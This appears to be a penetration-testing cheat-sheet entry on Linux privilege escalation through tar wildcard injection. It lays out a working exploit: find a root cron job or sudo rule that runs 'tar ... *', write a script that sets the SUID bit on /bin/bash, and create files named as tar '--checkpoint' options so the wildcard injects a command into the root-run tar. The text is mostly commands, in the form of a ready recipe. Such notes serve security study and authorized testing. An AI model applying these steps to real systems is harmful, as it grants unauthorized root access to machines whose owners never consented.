PRIMARY CATEGORY → LINUX PRIVESC
TAR
This technique leverage wildcards characters, such as *, along with some dangerous TAR options when the latter is executed as follows
cd /home/<USER> && tar -czvf <USER>_backup.tar *Since the * character expands to any existing, non-hidden file in the current directory, we can create certain files named as the following TAR options
--checkpoint[=N]
Display progress messages every Nth record (default 10).
--checkpoint-action=ACTION
Run ACTION on each checkpoint.So, the previous command will look like this
cd /home/<USER> && tar -czvf <USER>_backup.tar --checkpoint=1 --checkpoint-action=exec=bash <MALICIOUS_SCRIPT>Identifying the Misconfiguration
Cron Job
That said, imagine we have find out a CRON Job that runs every minute as ROOT
*/01 * * * * tar -czvf backup.tar *Sudo Privilege
Or we run sudo -l and see that we can run the following command as ROOT
tar -czvf john_backup.tar *Creating the malicious script
So first, we have to create a malicious script somewhere
echo 'chmod u+s /bin/bash' > /tmp/script.bashCreating the “TAR Option” files
Then, we create the following files in the current directory
echo '' > '--checkpoint-action=exec=/bin/bash /tmp/script.bash'
echo '' > '--checkpoint=1'Lastly, we wait for the given CRON Job to run or run the sudo command